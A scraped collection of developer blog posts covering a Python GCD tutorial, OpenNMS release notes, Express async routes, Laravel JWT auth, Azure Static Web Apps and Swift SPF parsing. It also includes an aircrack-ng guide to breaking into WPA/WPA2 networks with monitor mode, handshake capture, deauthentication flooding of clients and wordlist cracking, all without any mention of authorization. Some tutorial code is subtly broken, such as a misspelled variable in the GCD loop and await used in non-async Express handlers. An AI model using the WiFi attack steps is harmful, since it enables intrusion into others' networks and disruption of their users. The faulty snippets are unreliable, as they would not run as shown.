our task is to find numbers to replace `b` and `r` to complete our equation. according to the Euclidian theorem, `b` is the number of times `a` goes into (divides) `q` while `r` is the remainder of that operation.
so `5` goes into `4` once with a remainder of `1` so we will equate our remainder to `r` and our initial answer to b. In python we could use an inbuilt function called `divmod( )` to do this computation and it takes the two numbers as arguments and returns a quotient and remainder as the result in an array therefore in `index.py`
```
# formula is q = a * b + r
q = 5
a = 4
result = divmod(q,a)
b = result[0]
r = result[1]
```
However according to the Euclidian theorem, our remainder must be zero so if `r` isn't `0` we aren't done. It states that we have to place `a` in the position of `q` and `r` in the position of `a` or simply replace our initial values that were used in the calculation by new values following the above procedure therefore in `index.py`
```
# formula is q = a * b + r
q = 5
a = 4
result = divmod(q,a)
b = result[0]
r = result[1]
q = a
a = r
```
Take a scenario where you didn't use `(4 and 5)` , probably (11 and 5). You will have to repeat the calculations until `r = 0`. When `r = 0` , we obtain the gcd from the value of r just exactly before you did the last calculation to obtain `r = 0` for us to get the desired final result therefore in `index.py` we can use a for loop to do our calculations over and over until `r = 0` :
```
# formula is q = a * b + r
q = 5
a = 4
result = divmod(q,a)
b = result[0]
r = result[1]
q = a
a = r
finalResult = 0 #initialize a variable outside the for loop so
#that it is accessed globally
for i in range(q):
finalResult = r #store our gcd value as the loop is starting so
#that we can capture the previous value of r
#before the calculation which equates `r = 0`
result = divmod(q,a)
b = result[0]
r = result[1]
if r == 0:
break #constantly check the current value in r and make sure
#when it is 0 you can stop the loop
q = a
a = r
print(finalresult)
```
And that's it folks, Enjoy
Find me on [twitter](https://twitter.com/CoucoSeth) | coucoseth |
697,423 | May 2021 Releases – Horizon 27.2.0, Meridians 2021.1.0, 2020.1.8, 2019.1.19, and 2018.1.28 | In May, we released updates to all OpenNMS Horizon and Meridian versions under active support, and... | 0 | 2021-05-24T16:54:40 | https://www.opennms.com/en/blog/2021-05-13-may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28/?utm_source=rss&utm_medium=rss&utm_campaign=may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28 | news, horizon, meridian | ---
title: May 2021 Releases – Horizon 27.2.0, Meridians 2021.1.0, 2020.1.8, 2019.1.19, and 2018.1.28
published: true
cover_image: https://pbs.twimg.com/media/E1SY105WQAYSr1B?format=jpg&name=medium
date: 2021-05-13 15:20:10 UTC
tags: News,Horizon,Meridian
canonical_url: https://www.opennms.com/en/blog/2021-05-13-may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28/?utm_source=rss&utm_medium=rss&utm_campaign=may-2021-releases-horizon-27-2-0-meridians-2021-1-0-2020-1-8-2019-1-19-and-2018-1-28
---
In May, we released updates to all OpenNMS Horizon and Meridian versions under active support, and released the first iteration of Meridian 2021.
### Horizon 27.2.0
Horizon 27.2.0 is a release primarily targeting bug fixes, plus it includes our new branding refresh.
The codename for 27.2.0 is [_Magrathea_](https://hitchhikers.fandom.com/wiki/Magrathea).
For a high-level overview of what has changed in Horizon 27, see [What’s New in OpenNMS Horizon 27](https://docs.opennms.org/opennms/releases/27.2.0/releasenotes/releasenotes.html#releasenotes-27).
For a complete list of changes in 27.2.0, see [the detailed release notes](https://docs.opennms.org/opennms/releases/27.2.0/releasenotes/releasenotes.html#releasenotes-changelog-27.2.0).
### Meridian Point Releases
Meridian 2018.1.28 was a tiny release, containing only an update to Apache Commons IO.
Meridian 2019.1.19 adds a backport of a number of browser security issues fixed the previous month in newer releases, plus a few other bug fixes.
Meridian 2020.1.8 contains all of those changes, plus a few other small bug fixes.
For a list of changes, see the release notes:
- [2018.1.28](https://meridian.opennms.com/releasenotes/2018/latest/#_release_meridian_2018_1_28) ([_Solar Storm_](https://wikipedia.org/wiki/Solar_storm))
- [2019.1.19](https://meridian.opennms.com/releasenotes/2019/latest/#_release_meridian_2019_1_19) ([_Ditsö̀_](https://wikipedia.org/wiki/WASP-17b))
- [2020.1.8](https://meridian.opennms.com/releasenotes/2020/latest/#_release_meridian_2020_1_8) ([_Isthmus_](https://wikipedia.org/wiki/Isthmus))
### Meridian 2021
May also saw the release of Meridian 2021.1.0, the first in the 2021 series.
It is based on Horizon 27, which has proven to be one of our most solid series in quite a while. The most notable changes since Meridian 2020 (based on Horizon 26) are the removal of the legacy Remote Poller and the introduction of Application Perspective Monitoring, performing a similar set of functions using the Minion. Additionally, there are tons of bug fixes and other smaller feature improvements.
For an overview of what's changed since Meridian 2020, see the [What's New](https://docs.opennms.com/meridian/2021.1.0/releasenotes/whatsnew.html) section of the Meridian 2021 documentation.
Sharp readers will notice this is on our new [docs.opennms.com](https://docs.opennms.com/) site. We are in the process of moving projects from publishing to [docs.opennms.org](https://docs.opennms.org/) to the new Antora-based unified docs site. | rangerrick |
697,495 | If you had a time machine what is ONE thing you would tell yourself when you started coding? | I would probably tell myself to look up what imposter syndrome is so I can be relieved from all my do... | 0 | 2021-05-13T18:55:55 | https://dev.to/inspirezone/if-you-had-a-time-machine-what-is-one-thing-you-would-tell-yourself-when-you-started-coding-2jn2 | watercooler, career, beginners, reflect | I would probably tell myself to look up what imposter syndrome is so I can be relieved from all my doubts... Only discovered it was a real thing years into my career.
What about you? I’m very curious to know! | funbeedev |
697,637 | How to do Async express routes! | Overview I recently took a job at a product development company focusing on Back-end Devel... | 0 | 2021-05-14T17:50:13 | https://dev.to/ctooley21/how-to-do-async-express-routes-2imb |
# Overview
I recently took a job at a product development company focusing on Back-end Development! Part of the reality of working here is having to learn new technologies pretty often to fit whatever use-case we are going for. Recently we've been doing lots of web development using a combination of React & Node.js. Working in a JavaScript ecosystem is great, since we don't need to worry about parsing data ever and the Node environment is lightning fast, but we have to make sure that EVERYTHING is Asynchronous.
Developing in an asynchronous manner was a struggle at first, if you search online, you'll find many different options with various pros & cons. We tried three different setups in the span of about a month before finally coming to a point where we didn't want to bang our heads on the table when we had to develop or modify complex business logic. Hopefully today I'll be able to pass on some of the information that we learned so that you can hit the ground running!
# Our options
When I first arrived at work and starting developing, this is what our initial code looked like:
## Nested callbacks
```
router.post("/store/update", (req, res) => {
var someQuery = "CALL GetStore(?);";
sql.query(someQuery, [res.query.storeID], function(result, error) {
var store = result[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
sql.query(otherQuery, [req.query.storeID, field1, field2], function(result, error) {
//blah blah, nested queries
res.status(200).send();
});
}
});
});
```
You get the idea right? Lots of nesting in callbacks anytime we wanted to get some data, and then do other things on top of it. I **hated** it. To be fair I wrote most of this, and it wasn't really an issue till you get to 2+ levels of indention and need to change things. It gets especially tough when you want to add conditional queries as there is only one path of execution and its gotta be straight down the nesting tree.
After my frustration with nested callbacks had boiled up to an unimaginable level I had to change something! I started reading about promises online and saw the potential and got the go-ahead from my boss to convert our now 1-2 month old application to promise based.
## The Next Step: Promises
```
router.post("/store/update", (req, res) => {
var someQuery = "CALL GetStore(?);";
sql.query(someQuery, [res.query.storeID])
.then((result) => {
var store = result[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
return sql.query(otherQuery, [req.query.storeID, field1, field2]);
}
return;
}).then((result) => {
//do something here with the result of otherQuery
res.status(200).send();
}).catch((error) => {
//Handle any error that occured in either of the sql queries
console.log(error);
});
});
```
This was a little bit better. Promises enabled us to turn our horizontal problem (chains getting super wide) into a vertical issue. Still annoying after the first few days. It again like callbacks, would get really complicated and nearly impossible to write if you needed to add conditional Async requests.
## Our Savior: Async/Await syntax
So for us, promises were a big step up from callbacks, but as you can tell there was still lots of extra syntax and chaining that was really not needed. Async/Await syntax lets us get past that super easily. It still requires promise based functions, so for the previous example as well as this one, our SQL query function would be defined like so:
```
async function query(query, values) {
return new Promise(async(resolve, reject) => {
conn.query(query, values, function (error, results) {
if (error) {
reject(error);
}
resolve(results);
});
});
}
```
And switching to Async/Await syntax gives us this lovely, clean, and synchronous looking code:
```
router.post("/store/update", (req, res) => {
var someQuery = "CALL GetStore(?);";
var someQueryResult = await sql.query(someQuery, [res.query.storeID]);
var store = someQueryResult[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
var otherQueryResult = await sql.query(otherQuery, [req.query.storeID, field1, field2]);
//do something here
}
res.status(200).send();
});
```
Ding Ding Ding!!!! We have a winner. I **love** it. Clean, functional and no nesting!
Our only last issue with this situation revolves around error handling. With promises, you get your result in a .then() if there is one, and you get the error in the .catch() if there is one. But for async/await syntax the await part takes care of our .then(), but we still need a way to catch any errors so that our app doesn't crash. The following is an option:
```
var someQueryResult = await sql.query(someQuery, [res.query.storeID]).catch((error) => {
console.log(error);
});
```
But I am not the biggest fan of this, it adds a lot more code that we need to write for each function, and generally our queries should not return errors, just data (empty or not). So we decided to only catch errors when we absolutely need to, to be able to do this we turned to a cool little library called express-async-handler. What this async handler lets us do is turn every single one of our express routes into a promise, so that we can do async/await syntax inside of them, and if any error happens it would be caught with a .catch() and passed to a error handler that we define. It looks like this:
```
const ash = require('express-async-handler');
router.post("/store/update", ash((req, res) => {
var someQuery = "CALL GetStore(?);";
var someQueryResult = await sql.query(someQuery, [res.query.storeID]);
var store = someQueryResult[0][0];
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
var otherQueryResult = await sql.query(otherQuery, [req.query.storeID, field1, field2]);
//do something here
}
res.status(200).send()
}));
```
and our error handler:
```
app.use((error, req, res, next) => {
var status = error.status || 500;
res.status(status).json({
message: error.message
});
if(status != 500) {
console.log('We have encounted an error: ' + error.message + ' - ' + error.status);
console.log(error.stack);
}
});
```
This is awesome! It allows us to ignore errors generally and we know if they happen they get caught, logged and return a 500 to the request (which fits logically.) To put the icing on the cake, we can also using this create our own errors if we want using
a npm package called http-errors. This is really just a little object that we can pass our status and message to that gets used in the error handler.
```
const Error = require('http-errors');
router.post("/store/update", ash((req, res) => {
var someQuery = "CALL GetStore(?);";
var someQueryResult = await sql.query(someQuery, [res.query.storeID]).catch((error) => {
console.log(error);
});
var store = someQueryResult[0][0];
if (store == undefined || store == null) {
throw Error(200, 'That store object does not exist.');
}
//If something is true, do another query
if (thing) {
var otherQuery = "CALL UpdateStore(?,?,?);";
var otherQueryResult = await sql.query(otherQuery, [req.query.storeID, field1, field2]);
//do something here
}
res.status(200).send()
}));
```
Well that is it! After the switch to Async/Await syntax and adding the async handler & error catcher, we were able to make our code super clean and easy to work with. It is no longer a huge pain to go back and update routes to add new logic, and will aid the readability of our code in the future.
Thank you for reading and I hope I was able to help even just a little bit! | ctooley21 | |
697,650 | Laravel 8 e Autenticação JWT (tymon/jwt-auth) com Model customizada | Nesse artigo vou mostrar como implementar autenticação JWT (utilizando o pacote tymon/jwt-auth) em... | 0 | 2021-05-14T23:16:02 | https://dev.to/wenlopes/laravel-8-e-autenticacao-jwt-tymon-jwt-auth-com-model-customizada-2l7k | laravel, php, jwt, auth | Nesse artigo vou mostrar como implementar autenticação JWT (utilizando o pacote **tymon/jwt-auth**) em uma API com Laravel 8, utilizando uma Model diferente da padrão (Users). Ao final do texto, vou disponibilizar o link para o repositório contendo a implementação dos passos deste artigo :)
Então vamos lá!
## Instalação
Execute o comando para instalar o pacote
```bash
composer require tymon/jwt-auth
```
Publique o arquivo de configuração da biblioteca para sua pasta config, com o comando
```bash
php artisan vendor:publish - provider="Tymon\JWTAuth\Providers\LaravelServiceProvider"
```
Por fim, vamos gerar o JWT secret, utilizando o comando
```bash
php artisan jwt:secret
```
Esse comando vai adicionar a variável JWT_SECRET no seu arquivo `.env`
Em caso de qualquer dúvida sobre o
processo de instalação, [acesse o link oficial do pacote](https://jwt-auth.readthedocs.io/en/develop/laravel-installation/) com instruções para a instalação.
## Configuração da Model
Como dito anteriormente, vamos utilizar uma Model diferente da Users para armazenar os dados de usuários. Em nosso caso, vamos criar uma nova Model chamada Employee.
Para isso, vamos criar uma migration para criar uma tabela no nosso banco de dados com o mesmo nome da Model:
```bash
php artisan make:migration create_employee_table --create=employee
```
Nossa migration vai ter a mesma estrutura da migration de users que vem como padrão na instalação do Laravel, onde a única diferença será um campo a mais chamado "job_title". Fique a vontade para adicionar novas colunas, mas certifique-se que as colunas "email" e "password" serão criadas.
```php
Schema::create('employee', function (Blueprint $table) {
$table->id();
$table->string('name');
$table->string('email')->unique();
$table->string('password');
$table->string('job_title');
$table->timestamps();
});
```
Remova a migration para criação da tabela de users e rode as migrations
```bash
php artisan migrate
```
Crie a Model Employee
```bash
php artisan make:model Employee
```
*Obs: Adicione a variável $table na model, para passar o nome da tabela no singular, pois no momento de realizar a criação de usuário de teste (um pouco mais a frente nesse mesmo artigo), o Laravel vai por padrão tentar localizar a tabela no plural e vai ocasionar erro. Se você criou a tabela no plural (employees), pule o passo abaixo*
```bash
protected $table = 'employee';
```
Após a criação de nossa Model, vamos implementar a classe JWTSubject, implementando seus métodos. Além disso, vamos extender a classe Authenticatable do Laravel. No final, esse será o conteúdo de nossa Model
{% gist https://gist.github.com/WenLopes/29dbdc460badddfde6388caefa610342 %}
Muito bem, agora que temos nossa Model devidamente criada e configurada, é hora de configurarmos nosso provider de autenticação. Para isso, acesse o arquivo config/auth.php e vamos adicionar o novo índice 'employess' no array 'providers', contendo o driver (em nosso caso, vamos utilizar o Eloquent) e a model desejada.

Em seguida, no mesmo arquivo, vamos acessar o array "guards" e no array "api", vamos setar o driver "jwt" e o provider "employees" que acabamos de criar.

Por fim, vamos setar o guard "api" como o padrão de nossa aplicação. No mesmo arquivo, acesse o array "defaults" e defina o guard padrão como "api"

Feito isso, concluímos a configuração do nosso provider e o conteúdo final do arquivo config/auth.php será esse
{% gist https://gist.github.com/WenLopes/2ad0b52e47cd2163642e857bb21d4c05 %}
## Criando o controller e rota
Muito bem, agora que criamos e configuramos nossa Model, vamos criar o controller de autenticação para testar nossa implementação.
Crie o controller AuthController, com o mesmo conteúdo apresentado nesse [link do site oficial do pacote](https://jwt-auth.readthedocs.io/en/develop/quick-start/) e em seguida, crie a rota para realizar o login no arquivo `routes/api.php`
*Obs: Não se esqueça que a partir da versão 8 do Laravel, o controller deve ser importado no arquivo de rotas*
```php
use App\Http\Controllers\AuthController;
Route::post('auth/login', [AuthController::class, 'login'])->name('auth.login');
```
Para testar nosso endpoint, vamos criar um registro na tabela employee e utilizar os dados para autenticar.
No arquivo `DatabaseSeeder` , insira o seguinte conteúdo dentro do método `run`:
```php
\App\Models\Employee::create([
'name' => 'Usuário de teste',
'email' => 'usuario@teste.com.br',
'password' => bcrypt( 'senha123' ),
'job_title' => 'Gerente administrativo'
]);
```
E na sequência execute o comando:
```bash
php artisan db:seed
```
Por fim, utilize seu API client de preferência e consuma a rota de login **api/auth/login**, informando o email e senha criado na seeder. Se tudo ocorreu bem, o resultado será como o abaixo:

E pronto, sua autenticação com model customizada está funcionando.
Como disse anteriormente, você pode baixar o projeto com essa implementação através do meu repositório no Github (link abaixo). Nesse repositório, estou utilizando Docker para infraestrutura, contendo Nginx, Mysql e o Laravel em sua versão 8. Além disso, implementei o [pattern Strategy](https://refactoring.guru/pt-br/design-patterns/strategy) para retornar mensagens em casos de erro de autenticação e/ou token expirado, onde no segundo caso, um novo token atualizado é retornado (estou preparando um novo artigo para abordar esse tema :).
[Clique aqui e acesse o repositório](https://github.com/WenLopes/laravel8-jwt)
Então é isso pessoal, em caso de dúvidas, deixe nos comentários. Obrigado e até a próxima | wenlopes |
697,829 | Everything you need to know to deploy an Azure Static Web App | Azure Static Web Apps are so easy to use and integrate with Github Actions, Azure Functions or your custom authentication. Here is everything you need to deploy. | 0 | 2021-05-14T21:39:44 | https://dev.to/azure/everything-you-need-to-know-to-deploy-an-azure-static-web-app-fm6 | staticwebapps, azure, serverless, javascript | ---
title: Everything you need to know to deploy an Azure Static Web App
published: true
description: Azure Static Web Apps are so easy to use and integrate with Github Actions, Azure Functions or your custom authentication. Here is everything you need to deploy.
tags: staticwebapps, azure, serverless, JavaScript
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hwpjmzkf8oruna4eu73v.png
---
With [Azure Static Web Apps](https://azure.microsoft.com/en-us/services/app-service/static/?WT.mc_id=javascript-57623-ayyonet#overview) you can host your serverless web app, continiously deploy with Github actions and easily integrate with your Azure APIs or add your custom authentications and domains.
Sounds too good to be true? Well I would think so if I didn't get to deploy and set up automations with Github Actions, without needing to know anything about actions, in minutes.
You can read more about the key [Azure Static Web App features](https://docs.microsoft.com/en-us/azure/static-web-apps/overview?WT.mc_id=javascript-57623-ayyonet#key-features) or dive right into it. **Seeing is believing**, so here are all the things that you can get started with depending on your preference:
* [Tutorials](#tutorials)
* [How to Guides](#how-to-guides)
* [Code Samples](#code-samples)
### Tutorials
[](https://youtu.be/VzML-6DClVU)
* [Azure Learn Modules](https://docs.microsoft.com/en-us/learn/paths/azure-static-web-apps/?WT.mc_id=javascript-57623-ayyonet) covering everything from **Angular, React, Svelte, Vue, Gatsby** and plain old **JavaScript** to publishing a **Blazor WebAssembly app and .NET API**
* [Tutorials](https://docs.microsoft.com/azure/static-web-apps/publish-gatsby?WT.mc_id=javascript-57623-ayyonet) for working with static site generators to working with databases.
### How to Guides
[](https://youtube.com/playlist?list=PLlrxD0HtieHgMPeBaDQFx9yNuFxx6S1VG)
* [Setup your local development environment](https://docs.microsoft.com/azure/static-web-apps/local-development?WT.mc_id=javascript-28641-ayyonet)
* [Configure your frontend framework of your choice](https://docs.microsoft.com/en-us/azure/static-web-apps/front-end-frameworks?WT.mc_id=javascript-28641-ayyonet)
* [How to integrate with your Azure Functions](https://docs.microsoft.com/en-us/azure/static-web-apps/functions-bring-your-own?WT.mc_id=javascript-28641-ayyonet)
* [How to use a database with Azure Static Web Apps](https://docs.microsoft.com/en-us/azure/static-web-apps/add-mongoose?WT.mc_id=javascript-28641-ayyonet)
* [Set up your custom domain](https://docs.microsoft.com/en-us/azure/static-web-apps/custom-domain?tabs=azure-dns&WT.mc_id=javascript-28641-ayyonet)
* [How to do custom authentication with Azure Static Web Apps](https://docs.microsoft.com/en-us/azure/static-web-apps/authentication-custom?tabs=aad&WT.mc_id=javascript-28641-ayyonet)
### Code Samples
* [Microsoft code samples](https://github.com/microsoft/static-web-apps-gallery-code-samples?WT.mc_id=javascript-28641-ayyonet) with lots of cool projects and for different frameworks and integrations like [Azure Functions](https://docs.microsoft.com/en-us/azure/azure-functions/?WT.mc_id=javascript-28641-ayyonet) or [Azure Cognitive Services](https://docs.microsoft.com/en-us/azure/cognitive-services/?WT.mc_id=javascript-28641-ayyonet)

* [Awesome List of Azure Static Web Apps](https://github.com/microsoft/static-web-apps-gallery-code-samples/blob/master/media/angular-search-experience.gif)
* Finally, join us at [AI Show Live](https://www.microsoft.com/en-us/devrel/cognitiveservices/?WT.mc_id=aiml-28641-ayyonet) to see how we build and deploy with Cognitive Services for [AI Playground](https://github.com/aiadvocates/AIPlayground). Ask your questions and let us know the features you want to see on our [Github Discussion](https://github.com/aiadvocates/AIPlayground/discussions/?WT.mc_id=aiml-8567-ayyonet).
[](https://www.youtube.com/playlist?list=PLlrxD0HtieHinivDFATQd5qyjL6ijKHUF)
Let us know in the comments what you think and what you would like to see as a tutorial, code sample or a video about Azure Static Web Apps.
{% tag git %}{% tag webdev %}{% tag staticwebapps %} | yonet |
697,956 | Hacking wireless access points | If you want to know how to hack WiFi access points -- just read this step by step aircrack-ng tutoria... | 0 | 2021-05-14T07:36:23 | https://dev.to/rootsec1/hacking-wireless-access-points-598j | security |
If you want to know how to hack WiFi access points -- just read this step by step `aircrack-ng` tutorial, run the verified commands and crack passwords easily.
With the help a these commands you will be able to hack WiFi AP (access points) that use WPA/WPA2-PSK (pre-shared key) encryption.
The basis of this method of hacking WiFi lies in capturing of the WPA/WPA2 authentication handshake and then cracking the PSK using 'aircrack-ng'.
# Section 1, Aircrack-ng: Download and Install
-------------------------------------
### How to hack Wireless Access Points -- the action plan:
1. Download and install the latest `aircrack-ng`
2. Start the wireless interface in monitor mode using the `airmon-ng`
3. Start the `airodump-ng` on AP channel with filter for BSSID to collect authentication handshake
4. [Optional] Use the `aireplay-ng` to deauthenticate the wireless client
5. Run the `aircrack-ng` to hack the WiFi password by cracking the authentication handshake
### Install the required dependencies:
```console
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
```
### Download and install the latest `aircrack-ng` ([current version](http://www.aircrack-ng.org/doku.php?id=install_aircrack#current_version)):
```console
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install
```
### Ensure that you have installed the latest version of `aircrack-ng`:
```console
$ aircrack-ng --help
Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
http://www.aircrack-ng.org
```
# Section 2, Airmon-ng: Monitor Mode
---------------------------
Now it is required to start the wireless interface in monitor mode.
Monitor mode allows a computer with a wireless network interface to monitor all traffic received from the wireless network.
What is especially important for us -- monitor mode allows packets to be captured without having to associate with an access point.
Find and stop all the processes that use the wireless interface and may cause troubles:
```console
$ sudo airmon-ng check kill
```
### Start the wireless interface in monitor mode:
```console
$ sudo airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 6235 iwlwifi - [phy0]
(monitor mode enabled on mon0)
```
In the example above the `airmon-ng` has created a new wireless interface called `mon0` and enabled on it monitor mode.
So the correct interface name to use in the next parts of this tutorial is the `mon0`.
# Section 3, Airodump-ng: Authentication Handshake
-----------------------------------------
Now, when our wireless adapter is in monitor mode, we have a capability to see all the wireless traffic that passes by in the air.
This can be done with the `airodump-ng` command:
```console
$ sudo airodump-ng mon0
```
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:
```console
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
66:77:88:99:00:11 -64 134 345 34 1 54e WPA2 CCMP PSK SomeAP
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56
00:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 - 1 0 1
66:77:88:99:00:11 MM:NN:OO:PP:QQ:RR -78 2 - 32 0 1
```
Start the `airodump-ng` on AP channel with the filter for BSSID to collect the authentication handshake for the access point we are interested in:
```console
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
```
| Option | Description |
|-------------------------|-------------|
| `-c` | The channel for the wireless network |
| `--bssid` | The MAC address of the access point |
| `-w` | The file name prefix for the file which will contain authentication handshake |
| `mon0` | The wireless interface |
| `--ignore-negative-one` | Fixes the 'fixed channel : -1' error message |
| | |
Now wait until `airodump-ng` captures a handshake.
If you want to speed up this process -- go to the step #4 in section 1 and try to force wireless client reauthentication.
After some time you should see the `WPA handshake: 00:11:22:33:44:55` in the top right-hand corner of the screen.
This means that the `airodump-ng` has successfully captured the handshake:
```console
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 WPA handshake: 00:11:22:33:44:55
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56
```
# Section 4, Aireplay-ng: Deauthenticate Client
--------------------------------------
If you can't wait till `airodump-ng` captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP.
The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.
### Send deauth to broadcast:
```console
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
```
### Send directed deauth (attack is more effective when it is targeted):
```console
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
```
| Option | Description |
|--------|-------------|
| `--deauth 100` | The number of de-authenticate frames you want to send (0 for unlimited) |
| `-a` | The MAC address of the access point |
| `-c` | The MAC address of the client |
| `mon0` | The wireless interface |
| `--ignore-negative-one` | Fixes the 'fixed channel : -1' error message |
# Section 5, Aircrack-ng: Hack WiFi Password
-----------------------------------
Unfortunately there is no way except brute force to break WPA/WPA2-PSK encryption.
To hack WiFi password, you need a password dictionary.
And remember that this type of attack is only as good as your password dictionary.
You can download some dictionaries from [here](https://wiki.skullsecurity.org/Passwords).
### Crack the WPA/WPA2-PSK with the following command:
```console
$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
```
| Option | Description |
|--------|-------------|
| `-w` | The name of the dictionary file |
| `-b` | The MAC address of the access point |
| `WPAcrack.cap` | The name of the file that contains the authentication handshake |
Aircrack-ng 1.2 beta3 r2393
[00:08:11] 548872 keys tested (1425.24 k/s)
KEY FOUND! [ 987654321 ]
Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5
Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3
EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
| rootsec1 |
697,964 | Swift: Deconstruct SPF: Struct Mechanism | Today, I will start on building out the functionality of the struct Mechanism. This will involve... | 12,710 | 2021-05-20T04:09:44 | https://bas-man.dev/post/swift/swift-spf-struct-mechanims/ | swift, beginners, package, spf |
Today, I will start on building out the functionality of the `struct Mechanism`.
This will involve creating some tests, and basic functions.
## Instantiate the Mechanism Struct
We have our struct defined as such:
```swift
struct Mechanism {
var kind: MechanismKind;
var qualifier: Qualifier;
var mechanism: String;
init(k: MechanismKind, q: Qualifier, m: String) {
kind = k;
qualifier = q;
mechanism = m;
}
func mechanismString() -> String {
self.mechanism;
}
func whatKind() -> MechanismKind {
return self.kind;
}
func isPass() -> Bool {
return self.qualifier == Qualifier.Pass;
}
func isFail() -> Bool {
return self.qualifier == Qualifier.Fail;
}
func isSoftFail() -> Bool {
return self.qualifier == Qualifier.SoftFail;
}
func isNeutral() -> Bool {
return self.qualifier == Qualifier.Neutral;
}
func isNone() -> Bool {
return self.qualifier == Qualifier.None;
}
}
```
### init
This will instantiate the struct. Provide what kind of **mechanism** it is. Its **qualifier**, and the value of its **mechanism**.
### mechanismString
This will allow us to access the information stored in `mechanism` as a simple `String`
### isPass
This will return `Bool` of **true** if the Qualifier is `Pass`
### isFail
This will return `Bool` of **true** if the Qualifier is `Fail`
### isSoftFail
This will return `Bool` of **true** if the Qualifier is `SoftFail`
### isNeutral
This will return `Bool` of **true** if the Qualifier is `Neutral`
### isNone
This will return `Bool` of **true** if the Qualifier is `None`
### whatKind
This will help us understand if the mechanism represents a **redirect**, **A**, or some other mechanism.
## Testing
For this we need to take a look at `Tests/DeconSpfTests/DeconSpfTests.swift`.
Within this file we have the following initial set of code.
```swift
import XCTest
@testable import DeconSpf;
final class SPFTests: XCTestCase {
func testMechanismRedirect() {
let Mech = Mechanism(k: MechanismKind.Redirect, q: Qualifier.None, m: "test.com");
XCTAssertEqual(Mech.mechanismString(), "test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isNone(), true);
}
func testMechanismInclude() {
let Mech = Mechanism(k: MechanismKind.Include, q: Qualifier.Pass, m: "_spf.test.com");
XCTAssertEqual(Mech.mechanismString(), "_spf.test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Include);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isPass(), true);
}
static var allTests = [
("testMechanismRedirect", testMechanismRedirect),
("testMechanismInclude", testMechanismInclude),
]
}
```
Let's break down each test function.
```swift
func testMechanismRedirect() {
let Mech = Mechanism(k: MechanismKind.Redirect, q: Qualifier.None, m: "test.com");
XCTAssertEqual(Mech.mechanismString(), "test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isNone(), true);
}
```
What are is happening here:
1. Instantiate `Mech` and then we make four assertions.
2. mechanismString() matches "test.com"
3. whatKind() matches MechanismKind.Redirect
4. The MechanismKind is not MechanismKind.A
5. isNone() is `true`
```swift
func testMechanismInclude() {
let Mech = Mechanism(k: MechanismKind.Include, q: Qualifier.Pass, m: "_spf.test.com");
XCTAssertEqual(Mech.mechanismString(), "_spf.test.com");
XCTAssertEqual(Mech.whatKind(), MechanismKind.Include);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.Redirect);
XCTAssertNotEqual(Mech.whatKind(), MechanismKind.A);
XCTAssertEqual(Mech.isPass(), true);
}
```
This does the same basic tests, but for a mechanism that should be of MechanismKind.Include.
## Testing
```zsh
swift test
```
### Output
```zsh
[6/6] Linking DeconSpfPackageTests
Test Suite 'All tests' started at 2021-05-13 15:09:48.435
Test Suite 'DeconSpfPackageTests.xctest' started at 2021-05-13 15:09:48.436
Test Suite 'SPFTests' started at 2021-05-13 15:09:48.436
Test Case '-[DeconSpfTests.SPFTests testMechanismInclude]' started.
